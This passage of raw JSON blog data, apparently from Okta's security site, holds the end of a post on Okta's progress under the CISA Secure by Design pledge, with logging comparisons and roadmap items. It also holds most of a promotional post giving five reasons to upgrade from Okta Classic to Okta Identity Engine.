Gateway\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-header-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Fine-Grained Authorization (new)\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Logged events\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All user, administrator and support events for Okta Identity Engine, Okta Privileged Access, Okta Identity Governance, Identity Threat Protection, Okta Device Access\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User authentication and administrator events\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User authentication, access, authorization and administrative events. Administrators can \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oag/en-us/content/topics/access-gateway/admin-settings-logging-log-level.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"manage the type and verbosity\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of logged events.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Modify events\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Log File Retention\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"90 days\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Aligned with subscription level.\\n\\n30 days for Enterprise licensed customers \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"30 days\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"N/A\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrator access to logs\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Events can be \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Reports/syslog-filters.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"browsed, searched or filtered\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" directly in the Okta Admin Console. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\n\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Events can be \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/deploy-monitor/logs/view-log-events\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"browsed, searched or filtered\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" directly in the Auth0 Dashboard. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Events can be browsed, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oag/en-us/content/topics/access-gateway/admin-settings-log-download.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"downloaded\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oag/en-us/content/topics/access-gateway/about-logging.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"management console\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of the Okta Access Gateway, downloaded \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"N/A\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Programmatic access to log events\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Log events can be \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/reports/log-streaming/about-log-streams.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"streamed to security tools in near real-time\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", and can also be queried and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/system-log/#filtering-results\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"filtered\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" using the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/system-log/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log API\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Log events can be \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/customize/log-streams\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"streamed to security tools in near real-time\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", be can also be queried and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/deploy-monitor/logs/retrieve-log-events-using-mgmt-api\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"filtered\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" programmatically using the Auth0 Management API\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators can \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oag/en-us/content/topics/access-gateway/admin-settings-logging.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"configure log forwarders\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to push Okta Access Gateway logs to security tools.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Modify events can be queried using the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://docs.fga.dev/integration/advanced/read-tuple-changes\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Read Changes API\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is continually aiming to make log events more meaningful for security use cases. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In August 2024 alone:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta provided new ways to correlate events by session or by token in the Okta Platform. A new \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"rootSessionId \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"field was added to a range of user events to help security teams correlate all actions performed within the context of a user session. A new \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"rootTokenId \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"field to a range of management API events to help customer security teams correlate all API calls that use a specific token.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta provided administrators of the Auth0 Platform the ability to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/security-center/prioritized-log-streams\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"prioritize the streaming performance\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of security or risk-relevant event types (such as those relevant to detection and response) over other event types.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Target State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has identified a range of additional improvements that can help customer security teams respond more effectively to suspicious events. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The roadmap for the Okta Platform includes:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta will take Log investigator with Okta AI, currently in beta, to General Availability. Log Investigator provides customer admins an ability to construct System Log queries using natural language prompts. This aims to lower the bar for the domain knowledge required to work with System Log events.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta will add a new \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"changedDetails \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"field to a range of configuration events to help customer security teams quickly identify the delta between former and current state after a configuration event.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta will deliver optional System Log events for Workflows executions.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The roadmap for the Auth0 Platform includes:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta will deliver \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/changelog#3ZqzIY4EVn7T0OiwbKoLxC\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"alerts\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and visual indicators for deviations from customer-defined thresholds set in the Auth0 Security Center.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta will deliver Team-specific audit dashboards for configuration changes, administrative grants and current valid sessions. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta will deliver a visual session management dashboard for the Auth0 Management Console, along with the ability to revoke sessions. \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The roadmap for the Okta Fine-Grained Authorization includes:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta will deliver log streaming for the new FGA product in the first half of 2025.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Conclusion\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta applauds and thanks the US Cybersecurity and Infrastructure Security Agency’s efforts to promote Secure by Design among technology manufacturers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We look forward to working with our customers, partners, peers and CISA to contribute further to achieving a stronger default level of security for all users. \",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"Our progress against the CISA Secure By Design Pledge."},"updatedAt":"2025-02-09T23:53:33.760Z","secAuthor":[{"id":"87a8e5b7-da9e-56f7-95dc-37bd1aaee0d9","bio":{"bio":"David Bradbury is Chief Security Officer at Okta. As CSO, he leads overall security execution for the organization and his team is responsible for navigating the evolving threat landscape to best protect employees and customers. In addition, he is instrumental in helping Okta’s customers continue to adopt and accelerate Zero Trust security strategies.
\n\nPrior to joining Okta, Bradbury was Senior Vice President and Chief Security Officer at Symantec where he led and had global oversight of all cyber security and physical security programs.
\n\nBradbury has built an international reputation for leading and delivering cybersecurity at scale. He has worked across his native Australia, as well as in the United Kingdom and the United States, leading highly-regarded security teams at some of the world’s largest banks, including ABN AMRO, Barclays, Morgan Stanley and the Commonwealth Bank of Australia. He holds a B.S. in Computer Science from the University of Sydney.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg"},"name":"David Bradbury","jobTitle":"Chief Security Officer","slug":"david-bradbury","node_locale":"en"}]},{"slug":"/articles/2024/five-reasons-to-upgrade-to-oie","id":"b65b742a-67d9-572a-ab7c-0861981334ee","title":"Five Reasons to Upgrade your Org to Okta Identity Engine","date":"2024-11-20T10:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Both \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Okta\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Customer Identity \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"built to support end users’ digital access needs, and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Okta Workforce Identity ,\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" built to secure your internal workforce, are OIE-eligible platforms.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s industry-leading Identity solutions are powered by the same underlying infrastructure. Okta Classic is Okta’s legacy engine and the Okta Identity Engine, or OIE, was introduced for all new customers effective March of 2022.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-1\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What is OIE?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s Identity Engine offers the most modern way to customize your Okta experience and implement flexible, customized Identity use cases. OIE is Okta’s newest improved platform engine, offering a security policy framework designed to align with NIST 80063B and an authentication pipeline that strengthens your identity posture while delivering a superior user experience (UX).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine grants Okta administrators increased control for administrators over how applications and resources are both protected and accessed, while maintaining a seamless experience for end users.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-1\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Why should you upgrade?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There are numerous security features to configure, customize and leverage in the Okta Identity Engine. Key benefits of upgrading your org include:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. Accessibility\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Upgrading an existing Okta org from Okta Classic’s engine to OIE is a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"free\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"platform upgrade\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\", meaning there is no additional investment required.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Most features and functionality are available immediately post-upgrade to OIE, and the majority of your existing org configurations will seamlessly migrate. Most upgrades only take a few minutes to complete, with \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"no downtime\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" for admins or end users.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta also offers exceptional flexibility for administrators looking to upgrade. Admins can use \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine-upgrade/self-service/self-service-process.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"self-service\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" tools to verify your org’s eligibility, resolve any pending action items, and schedule the upgrade at a time that best suits you. Even better, the upgrade from Okta Classic to OIE can be scheduled for \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"any time during your Okta subscription term\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. Enhanced authentication\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine is designed to evaluate more granular context during user authentication, but also make authentication policies much easier to manage.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Application-level sign-on policies that were configured on a per-application basis in Okta Classic can instead be configured for multiple applications at once, or according to the assurance level you require from the user to sign-in, using Okta Identity Engine.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In addition, benefits of OIE authentication include the enabling of modern, true multi-factor authentication (MFA) with different factor types and abstraction through assurance level. MFA possession factor constraints are introduced to further secure your org, including phishing-resistant MFA such as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/products/fastpass/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta FastPass\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", hardware protected MFA, and the exclusion of any authentication method by name, if you choose. We recommend higher assurance factors, specifically \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/10/phishing-resistant-mfa-shows-great-momentum/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"phishing-resistant authentication.\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. Passwordless\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In Okta Classic, the default method of sign-in for any policy required the end user to provide a password, unless avoided via factor sequencing which can pose both flexibility and management challenges. To contribute to a Zero Trust security framework, OIE enables password-specific capabilities including no password or optional password authentication conditions. Please note that both Okta Classic and OIE support factor sequencing.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"OIE global session policies, again configurable for an entire org and not only on a per-application basis, can be tailored to require any factor type(s) used to meet the minimum configured authentication policy requirements, which can exclude a password.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For higher assurance, Okta recommends a combination of multiple factor types, specifically biometrics alongside phishing-resistant MFA such as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/products/fastpass/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta FastPass\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/mfa-webauthn.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"FIDO2\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". An alternative better suited to Customer Identity flows is a configured \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/guides/authenticators-okta-email/-/main/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"email magic link\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" authentication sign-on policy, where end users will receive a URL via email for a click-to-login experience.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4. Device assurance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s Identity platforms both support native device assurance capabilities and seamlessly integrate with device management technologies to further secure your data, enforcing a Zero Trust security framework. Device trust contextual access management solutions enable orgs to protect sensitive corporate resources by only allowing end users with managed devices to access Okta-integrated applications. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Benefits of device trust in OIE include advanced security authentication configurations factoring in conditions such as the below, among others in order to increase your device assurance posture:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Device OS and/or type, \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Device password protection and length,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Registration status,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Whether the device is jailbroken or rooted.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"OIE requires the use of Okta Verify to secure your org’s mobile devices. For more on translating device trust from Okta Classic to OIE, visit our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/Setting-Up-Desktop-Device-Trust-in-Okta-OIE-A-Guide-for-those-who-have-it-Implemented-in-Okta-Classic?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"knowledge base\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"5. Improved admin experience\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s Identity solutions consider the user experience which includes both end users authenticating and technical \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/administrators-admin-comparison.htm?cshid=ext-administrators-admin-comparison\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"administrators\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of the Okta org. Okta’s administrator console supports efficient, methodical Identity management.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In Okta Classic, the admin console boasts the legacy navigation pane with condensed configuration pages, whereas Okta Identity Engine’s navigation pane introduces additional configuration pages, refined more granularly for ease of administrator use. In addition to the new customizable settings in OIE, certain pages have changed which notably introduce an easy-to-navigate user interface.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As previously highlighted, a key benefit is that application authentication policies in OIE can be configured by administrators and assigned to multiple applications in an Okta org, rather than applications uniquely requiring individual policies.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-1\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Upgrade now\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Ultimately, to best capitalize on Okta’s powerful Identity platforms and improve your security assurance posture, we strongly recommend upgrading your org from Okta Classic to Okta Identity Engine. The key benefits outlined here represent just a fraction 